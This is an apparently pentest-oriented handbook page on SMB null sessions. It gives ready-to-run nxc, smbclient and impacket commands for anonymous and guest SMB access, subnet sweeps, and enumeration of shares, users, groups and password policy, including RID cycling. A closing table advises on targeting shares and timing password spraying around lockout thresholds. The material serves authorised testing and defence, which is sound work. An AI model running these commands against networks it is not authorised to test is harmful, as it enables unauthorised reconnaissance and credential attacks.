Handbook

SMB Null Sessions

Updated 29 Sept 2026Services✎ Suggest a change
On this page

Attack Flow

plain text
Anonymous/guest SMB connect → IPC$ access → Enumerate shares/users/groups/policy
→ Feed usernames into spraying / AS-REP roasting / Kerbrute

Check for Null Session / Guest Access

bash
nxc smb <target-ip> -u '' -p ''
nxc smb <target-ip> -u 'guest' -p ''

# Sweep subnet
nxc smb 10.1.10.0/24 -u '' -p ''
nxc smb 10.1.10.0/24 -u 'guest' -p ''

Enumerate Shares

bash
nxc smb <target-ip> -u '' -p '' --shares
nxc smb <target-ip> -u 'guest' -p '' --shares

smbclient \\\\<target-ip>\\<share-name> -N
smbclient -L <target-ip> -N

Enumerate Users and Groups

bash
nxc smb <target-ip> -u '' -p '' --users
nxc smb <target-ip> -u '' -p '' --groups

# RID cycling — works even when direct enum is blocked
nxc smb <target-ip> -u '' -p '' --rid-brute

impacket-lookupsid <domain>/<username>@<target-ip> -no-pass

Enumerate Password Policy

bash
nxc smb <target-ip> -u '' -p '' --pass-pol

What Each Result Tells You

FindingImplication
Null session allowedFull anonymous enumeration likely possible
Guest account activeEnumerate shares immediately
Shares visibleCheck IT, backup, finance, scripts shares
Users enumeratedFeed into Kerbrute, AS-REP roasting, spraying
Lockout threshold 0No lockout — spraying safe
Lockout threshold 3-5Spray carefully — one attempt per user per window